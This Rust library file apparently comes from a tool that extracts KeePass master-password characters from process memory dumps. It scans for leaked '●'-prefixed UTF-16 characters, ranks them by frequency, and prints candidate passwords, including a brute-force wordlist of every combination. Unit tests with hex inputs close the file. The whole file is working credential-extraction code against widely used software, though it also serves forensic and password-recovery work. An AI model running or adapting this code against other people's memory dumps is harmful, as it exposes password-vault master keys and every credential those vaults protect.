keepass_dump_extractor/
lib.rs1use itertools::Itertools;
2use once_cell::sync::Lazy;
3use std::collections::{HashMap, HashSet};
4
5use cli::Format;
6
7pub mod cli;
8
9const PREFIX: [u8; 2] = [0xCF, 0x25]; static VALID_CHARS: Lazy<HashSet<char>> = Lazy::new(|| {
12 let mut set = HashSet::new();
13 for range in [0x20..=0x7E, 0x0A0..=0x2AF, 0x1E00..=0x1EFF] {
14 set.extend(range.filter_map(char::from_u32));
15 }
16 set
17});
18static COMMON_CHARS: Lazy<Vec<char>> =
19 Lazy::new(|| (0x20..=0x7E).filter_map(char::from_u32).collect());
20
21pub fn find_leaks(bytes: &[u8]) -> Vec<(usize, char)> {
22 let mut results = Vec::new();
23 let mut length = 0;
24 let mut i = 0;
25 while i < bytes.len() - 1 {
26 if bytes[i..i + 2] == PREFIX {
28 length += 1;
29 i += 2;
30 continue;
31 } else if length > 0 {
32 if let Some(Ok(c)) =
34 char::decode_utf16([u16::from_le_bytes([bytes[i], bytes[i + 1]])]).next()
35 {
36 if VALID_CHARS.contains(&c) && bytes[i + 2..i + 4] == [0x00, 0x00] {
38 results.push((length, c));
39 i += 4;
40 continue;
41 }
42 }
43 }
44 length = 0;
45 i += 1;
46 }
47
48 results
49}
50
51fn group_by_length(leaks: Vec<(usize, char)>) -> HashMap<usize, Vec<(usize, char)>> {
52 let mut map = HashMap::new();
53 for leak in leaks {
54 map.entry(leak.0).or_insert(vec![]).push(leak);
55 }
56
57 map
58}
59
60fn count_duplicates(leaks: &[(usize, char)]) -> HashMap<(usize, char), usize> {
61 let mut map = HashMap::new();
62 for leak in leaks {
63 map.entry(*leak).or_insert(0);
64 *map.get_mut(leak).unwrap() += 1;
65 }
66
67 map
68}
69
70fn order_by_duplicates(leaks: &[(usize, char)]) -> Vec<(usize, char)> {
71 let map = count_duplicates(leaks);
72
73 let mut leaks = map.into_iter().collect::<Vec<_>>();
74 leaks.sort_by(|((a1, _), a2), ((b1, _), b2)| match a1.cmp(b1) {
75 std::cmp::Ordering::Equal => a2.cmp(b2).reverse(),
76 other => other,
77 });
78 leaks.into_iter().map(|(leak, _)| leak).collect()
79}
80
81fn get_unknowns_and_knowns(
82 leaks: Vec<(usize, char)>,
83 insert_common: bool,
84) -> (Vec<Vec<(usize, char)>>, Vec<char>) {
85 let leaks = order_by_duplicates(&leaks);
86 let leaks = group_by_length(leaks);
87 let max_length = *leaks.keys().max().unwrap() + 1;
88
89 let unknowns = (0..max_length)
90 .filter_map(|length| {
91 let chars = leaks.get(&length).cloned().unwrap_or_else(|| {
92 if insert_common {
93 COMMON_CHARS.iter().map(|&c| (length, c)).collect()
95 } else {
96 vec![]
97 }
98 });
99 (chars.len() > 1).then_some(chars)
100 })
101 .collect::<Vec<_>>();
102 let mut password = vec!['●'; max_length];
103 leaks.iter().for_each(|(length, chars)| {
104 if chars.len() == 1 {
105 password[*length] = chars.iter().next().unwrap().1;
106 }
107 });
108 (unknowns, password)
109}
110
111pub fn print_formatted_leaks(leaks: &[(usize, char)], format: cli::Format) {
112 match format {
113 Format::Found => {
115 let leaks = order_by_duplicates(leaks);
116
117 for (length, c) in leaks {
118 println!("{}{}", "●".repeat(length), c);
119 }
120 }
121 Format::Gaps => {
123 let (unknowns, password) = get_unknowns_and_knowns(leaks.to_vec(), false);
124
125 for unknown in unknowns {
126 for (length, c) in unknown {
127 let mut password = password.clone();
128 password[length] = c;
129 println!("{}", password.iter().collect::<String>());
130 }
131 }
132 }
133 Format::All => {
135 let (unknowns, mut password) = get_unknowns_and_knowns(leaks.to_vec(), true);
136
137 for perm in unknowns.iter().multi_cartesian_product() {
138 for (length, c) in perm {
139 password[*length] = *c;
141 }
142 println!("{}", password.iter().collect::<String>());
143 }
144 }
145 Format::Raw => {
147 let map = count_duplicates(leaks);
148 let mut leaks = map.into_iter().collect::<Vec<_>>();
149 leaks.sort_by(|((a1, _), _), ((b1, _), _)| a1.cmp(b1));
150
151 for ((length, c), count) in leaks {
152 println!("{count}\t{length}\t{c}");
153 }
154 }
155 }
156}
157
158#[cfg(test)]
159mod tests {
160 use super::*;
161 use hex_literal::hex;
162
163 #[test]
164 fn simple_character() {
165 let input = hex!("cf2500004141414141414141cf25cf25cf25670000004242424242424242");
166
167 assert_eq!(find_leaks(&input), vec![(3, 'g')]);
168
169 let input = hex!("cf25cf25cf25cf25cf25cf25cf25cf25cf25cf25cf25cf2541000000");
170 assert_eq!(find_leaks(&input), vec![(12, 'A')]);
171 }
172
173 #[test]
174 fn non_ascii_character() {
175 let input = hex!("cf25cf25cf25cf2553010000");
177
178 assert_eq!(find_leaks(&input), vec![(4, 'œ')]);
179 }
180}